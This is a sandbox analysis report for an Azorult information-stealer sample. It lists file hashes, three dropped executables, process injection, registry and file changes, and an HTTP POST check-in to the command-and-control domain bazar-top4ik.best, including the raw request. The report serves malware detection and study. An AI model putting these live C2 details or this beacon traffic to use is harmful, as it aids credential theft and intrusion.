- * MalFamily: "Azorult"
- * MalScore: 10.0
- * File Name: "Exes_6dd6c0fb50575dbc60ecf613448ebf9d.exe"
- * File Size: 5051392
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "65e2691ab4f2bac652eac54f6e9ecdf6e8af048add3d8e4b5a460a9b20bf6ea8"
- * MD5: "6dd6c0fb50575dbc60ecf613448ebf9d"
- * SHA1: "b4ca1f863beda10a2540f293a0f22fad82c14b52"
- * SHA512: "e348b323b1d765d9a977261df3d23cd35d7cb2cf64b8ad16557c2521a86d0ded36ab6eda2c3864db5b511f3a49056a233e3d230a8ef175b57e31a51ee97cf9e0"
- * CRC32: "03EF2E17"
- * SSDEEP: "98304:y2cPK8EYBYW1KR2h/6796vOxkHxXkEfz/DCn5jo6zCQiWSa4Je:dCKRU1KRm/6BmRHpkE3Cn5Uov2e"
- * Process Execution:
- "Exes_6dd6c0fb50575dbc60ecf613448ebf9d.exe",
- "Loki.exe",
- "setup2.exe",
- "setup2.exe",
- "test.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\Loki.exe\"",
- "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\Loki.exe ",
- "\"C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\setup2.exe\"",
- "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\setup2.exe ",
- "\"C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\test.exe\"",
- "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\test.exe "
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "setup2.exe, PID 2516"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\test.exe"
- "binary": "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\setup2.exe"
- "binary": "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\Loki.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "suspicious_request": "http://bazar-top4ik.best/index.php"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://bazar-top4ik.best/index.php"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: .rsrc, entropy: 7.99, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00406e00, virtual_size: 0x00406da3"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "setup2.exe(292) -> setup2.exe(2516)"
- "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
- "Details":
- "target": "clamav:Win.Malware.Autoit-7090832-0, sha256:65e2691ab4f2bac652eac54f6e9ecdf6e8af048add3d8e4b5a460a9b20bf6ea8, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "dropped": "clamav:Win.Malware.Autoit-7090832-0, sha256:af7182ad65554c96ecb166847c9685d4edc65e9aace1655cad4bcfdb7f129dda , guest_paths:C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\setup2.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN AZORult Variant.4 Checkin M2"
- * Started Service:
- * Mutexes:
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "A81FB8C6-0BBE6E18-6FC9B5DB-536DA455-933946726"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut615F.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\Loki.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut63F0.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\setup2.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut6559.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\test.exe"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut615F.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut63F0.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut6559.tmp"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- * DNS Communications:
- "type": "A",
- "request": "bazar-top4ik.best",
- "answers":
- "data": "104.27.172.200",
- "type": "A"
- "data": "104.27.173.200",
- "type": "A"
- * Domains:
- "ip": "104.27.172.200",
- "domain": "bazar-top4ik.best"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "J/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
- "uri": "http://bazar-top4ik.best/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "bazar-top4ik.best",
- "version": "1.1",
- "path": "/index.php",
- "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: bazar-top4ik.best\r\nContent-Length: 105\r\nCache-Control: no-cache\r\n\r\nJ/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC: